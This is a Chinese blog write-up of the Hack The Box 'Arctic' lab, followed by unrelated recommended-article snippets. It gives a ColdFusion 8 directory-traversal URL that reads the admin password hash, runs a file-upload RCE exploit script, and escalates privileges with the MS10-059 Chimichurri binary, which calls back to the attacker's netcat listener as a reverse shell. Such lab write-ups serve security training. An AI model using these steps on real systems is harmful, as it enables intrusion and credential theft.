HTB-Arctic

最新推荐文章于 2025-05-27 20:12:36 发布
最新推荐文章于 2025-05-27 20:12:36 发布
阅读量596 收藏 9
点赞数 12
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75378806/article/details/138920029
版权

简单难度

端口扫描

135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown

进入cfide,浏览./CFIDE/显示了adobe的应用程序(专门用于创建动态网页以及网络应用程序和设计的开发工具)。再进去到adminstrator,发现了一个名为Adobe Cold Fusion 版本 8的中央管理系统 (CMS)

searchsploit Cold Fusion ,这边我利用了文件上传和rce都不行,利用目录遍历的可以

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

%00en.可能该网站正在确保locale以合理的字符串结尾,,然后得到admin的hash值

登入来到后台

coldfusion8后台计划任务拿shell_coldfusion shell-优快云博客这是它百度找到提权的文章

文件上传我没成功但是具体的操作是

searchsploit -m 50057.py

这里的脚本有 LHOST、LPORT、RHOST 和 RPORT,需要对其进行编辑。它还表明它制作了一个 java (JSP) 有效负载并使用 post 请求将其上传到网络服务器。在其上方,它显示了“执行有效负载”和“侦听器连接”的定义,以定义脚本导航到执行有效负载的位置,并使用 netcat 捕获 shell。

执行

python3 ./50057.py

这是直接利用meter的

ColdFusion 8.0.1 Arbitrary File Upload and Execute

成功获得第一个flag

提权:

systeminfo

和上台一样是Windows 2008 R2 服务器没打补丁且土豆提权的前提有 可以利用试试(这边先不用)

试试用工具

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

python -m pip install xlrd

root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update

将(sysinfo的信息复制到文件里)

python2.7 windows-exploit-suggester.py --database 2023-12-04-mssb.xls -i system.txt 

可能工具太老了,用不了

用一下MS10-059 

windows-kernel-exploits/MS10-059: Chimichurri at master · egre55/windows-kernel-exploits · GitHub

本地smbserver.py share .

靶机net use \\10.10.14.47\share

copy \\10.10.14.47\share\Chimichurri.exe .

\Chimichurri.exe 10.10.14.47 443

kali监听rlwrap nc -nvlp 443

kikifofo
关注
Android图像处理值Region
gu_solo的博客
03-23 1040
Region.op:当两个区域重合时该如何处理,有6个取值: DIFFERENCE::从region1中减去region2 INTERSECT:区region1和region3部分 REPLACE:用region2替换region1 REVERCE_DIFFERENCE:从region2中减去region1 UNION:合并region1和region2 XOR:取region1和re
opengl api
gangyanliang的专栏
08-22 1207
OpenGL库函数列表 OpenGl核心函数库   glAccum 操作累加缓冲区 glAddSwapHintRectWIN 定义一组被SwapBuffers拷贝的三角形 glAlphaFunc允许设置alpha检测功能 glAreTexturesResident 决定特定的纹理对象是否常驻在纹理内存中 glArrayElement 定义一个被用于顶点渲染的数组成分 glBegin
OPENGL中的帧缓存区概述
weixin_30732825的博客
02-19 367
(1)帧缓存介绍 OPENGL系统的帧缓冲区是由所有存储着像素信息的缓冲区组成的,包括:颜色缓冲区、深度缓冲区、模板缓冲区、累积缓冲区。可以使用glGetIntegerv()查询特定画面可用的缓冲区的存储信息。 颜色缓冲区是用于绘图的缓冲区,它包含了颜色索引或者RGB颜色数据,还可能有alpha数据。若OPENGL支持立...
OpenGL库函数列表
水云间
06-30 1225
<br />OpenGl核心函数库 glAccum 操作累加缓冲区<br />glAddSwapHintRectWIN 定义一组被SwapBuffers拷贝的三角形<br />glAlphaFunc允许设置alpha检测功能<br />glAreTexturesResident 决定特定的纹理对象是否常驻在纹理内存中<br />glArrayElement 定义一个被用于顶点渲染的数组成分<br />glBegin,glEnd 定义一个或一组原始的顶点<br />glBindTexture 允许建立一个绑定
OpenGL帧缓冲区
weixin_34232744的博客
11-19 392
OpenGL窗口中, 左下角的像素为(0, 0). 一般而言, 像素(x, y)占据的矩形区域左下角为(x, y), 右上角为(x+1, y+1). 10.1 缓存及其用途 1) 颜色缓存, 左前,右前,左后,右后和任意数量的辅助颜色缓存;2) 深度缓存3) 模板缓存4) 累积缓存 注意:X窗口系统,RGBA模式至少保证1个颜色缓冲区,模板缓冲区,深度缓冲区,累计缓冲区颜色索引模式至...
WARNING: The scripts pip, pip3 and pip3.9 are installed in '/home/lgc/.local/bin' which is not on PATH. Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
07-07
关于您的问题,您可以通过将'/home/lgc/.local/bin'目录添加到您的PATH环境变量中来解决此警告。这样做的方法会因操作系统而有所不同,下面是一些常见操作系统的解决方法: 对于Linux和macOS用户: 1. 打开终端。 2...
Inconsolata-LGC:Inconsolata LGC扩展
02-05
Inconsolata-LGC:Inconsolata LGC扩展
Opengl LGC_Lsys.rar
02-27
一个用opengl编写的植物根生长系统。
LGC算法-SCI经典
09-16
LGC算法,全称为Learning with Local and Global Consistency,是一种图学习算法,主要用于图上的半监督学习。该算法利用图的结构特征来传播标签信息,使具有相似结构的节点标签趋于一致。LGC算法的提出,是为了更好...
OpenGL实现的植物根系生长模拟系统
标题中的“Opengl LGC_Lsys.rar”指的是一个利用OpenGL图形库编写的程序文件包。OpenGL(Open Graphics Library)是一个跨语言、跨平台的应用程序编程接口(API),用于渲染2D和3D矢量图形。该库广泛应用于计算机...
Opengl纹理映射
wymhhgg99的专栏
01-11 1419
9.4 纹理对象 使用纹理对象来存储纹理数据的步骤: 1) 生成纹理对象名称 2) 将纹理对象绑定到纹理数据(包括图像数据数组和纹理属性), 即创建纹理对象. 3) 如果OpenGL实现高性能纹理工作集, 应检查是否有足够的空间来存储所有的纹理对象. 如没有足够空间, 应设置每个纹理对象的优先级, 以确保最常用的纹理留在工作集中 4) 绑定和重新绑定纹理对象, 以便可以将其中的纹理
opengl函数
鶸者为何战斗
06-03 749
1.glAccum--操作在多重缓冲区中进行; 2.glAlphaFunc--指定Alpha测试函数; 3.glBegin--开始操纵一组点进行画图; 4.glBitmap--再设备上画一指定属性的位图文件; 5.glBlendFunc--指定象素的算法; 6.glCallList-- 执行一个显示列表; 7.glCallLists-- 执行一组显示列表; 8.glClear--在视
帧缓冲区
依文依叶
07-04 3522
1.帧缓存包括颜色、scissor、alpha、stencil、depth这些缓存,所以帧缓存不是一片缓存,而是所有这些缓存的组合,帧缓存它对应了屏幕上的每一个pixel(不是真正的pixel,而是一个fragment所对应的位置)的各种这些信息(颜色、ZBUFFER、等等),几何体的fragment时没有帧缓存的,帧缓存时屏幕上的,一个缓存的一位就对应一个位片面。 Colorbuffer是最终
OpenGL系列教程之十一:OpenGL网格化
10-22 9464
网格化是将凹多边形或有边相交的多边形划分成凸多边形。由于openGL渲染时只接受凸多边形,这些非凸多边形在渲染之前必须先被网格化。 第一行中第一个图形是4条边的凹多边形,第二个图形中间有个洞,第三个图形有相交的边 下载:tessellation.zip,stencilTest.zip 概述 网格化基本的步骤是将所有非凸多边形的顶点坐标
WPF【11_4】WPF实战-重构与美化(MVVM 架构)
keke10的专栏
05-27 878
点击刷新, UI 则会通过发送事件的方式通知视图模型,而视图模型在收到刷新请求以后,就会去数据库提取数据,然后重新把数据提供给视图。最后,视图与模型之间由于加入了视图模型,所以产生了系统的分层,而数据也得到了有效的隔离,它们之间则是一个间接引用的关系。虽然对于一个 WPF 项目来说,仅仅使用 Model 和 View, 甚至只使用 View 也能完成各种各样复杂的功能,比如说上一章我们的实战项目只有 View, 同样也可以完成客户预约系统的开发。而视图模型作为业务逻辑的载体,也会承担与数数据库的沟通工作。
springboot--实战--大事件--用户接口开发
最新发布
m0_73856804的博客
05-27 1891
定义了一种简洁的、自包含的格式,用于通信双方以JSON数据格式安全的传输信息。组成:第一部分:Header(头),记录令牌类型、签名算法等。例如,算法用于防篡改第二部分:Payload(有效载荷),携带一些自定义信息,默认信息。例如。而外在表示为一段无规律的64个可打印字符原因:借助base64编码方式(Base64:是一种基于64个可打印字符(A-Z a-z 0-9 + /)来表示二进制数据的编码方式)来完成,将json字符串变为64个可打印字符,
21. 自动化测试框架开发之Excel配置文件的测试用例改造
Tom的专栏
05-20 1397
本文介绍了如何通过Excel配置文件实现自动化测试用例的改造。首先,测试框架的核心架构依赖于unittest、paramunittest、页面对象模型和Excel数据读取器。其次,通过ExcelReader加载Excel数据,支持参数化测试。测试用例参数化方案包括使用paramunittest和subTest,后者支持单测试方法管理多组数据,失败时继续执行后续用例。关键技术点包括数据驱动流程和异常处理机制,确保测试失败时自动截图并保留异常堆栈。Excel数据规范要求第一行为标题行,列名与代码参数对应。工程实
SpringMVC(结合源码浅析工作流程)
weixin_45865163的博客
05-23 870
Spring MVC是基于前端控制器()设计模式的 Web 框架,在 Web 应用中指一个统一的入口,用来接收所有客户端请求,并统一进行分发、处理。在SpringMVC中,前端控制器就是Controller。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值